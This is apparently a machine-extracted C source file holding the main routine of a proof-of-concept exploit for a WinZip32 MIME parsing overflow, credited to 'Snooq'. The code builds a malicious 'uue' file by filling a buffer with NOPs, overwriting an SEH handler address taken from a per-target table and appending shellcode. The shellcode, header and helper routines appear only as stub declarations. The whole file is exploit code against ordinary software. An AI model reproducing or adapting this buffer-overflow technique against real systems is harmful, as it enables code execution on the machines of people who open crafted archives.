
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int jmpADD; int topSEH; } ;


 int BSIZE ;
 scalar_t__ HSIZE ;
 scalar_t__ IDXOFF ;
 int NOP ;
 scalar_t__ PAD ;
 scalar_t__ SSIZE ;
 int TARGET ;
 int atoi (char*) ;
 scalar_t__ buff ;
 int buildfile () ;
 int filladdr () ;
 int header ;
 int memcpy (scalar_t__,int ,scalar_t__) ;
 int memset (scalar_t__,int ,int ) ;
 int printf (char*,...) ;
 int shellcode ;
 TYPE_1__* targets ;
 int what ;
 int where ;

int main(int argc, char *argv[])
{
 int i=0, t=TARGET;

 if (argc==2) { t=atoi(argv[1]); }

 where=targets[t-1].topSEH;
 what=targets[t-1].jmpADD;

 printf("\nWinZip32 MIME Parsing Overflow PoC, By Snooq [jinyean@hotmail.com]\n\n");

 memset(buff,NOP,BSIZE);
 printf("-> Generating 'uue' file for target #%d...\n",t);
 memcpy(buff,header,HSIZE);
 filladdr();
 memcpy(buff+HSIZE+IDXOFF+4+PAD,shellcode,SSIZE);
 buildfile();

 return 0;

}
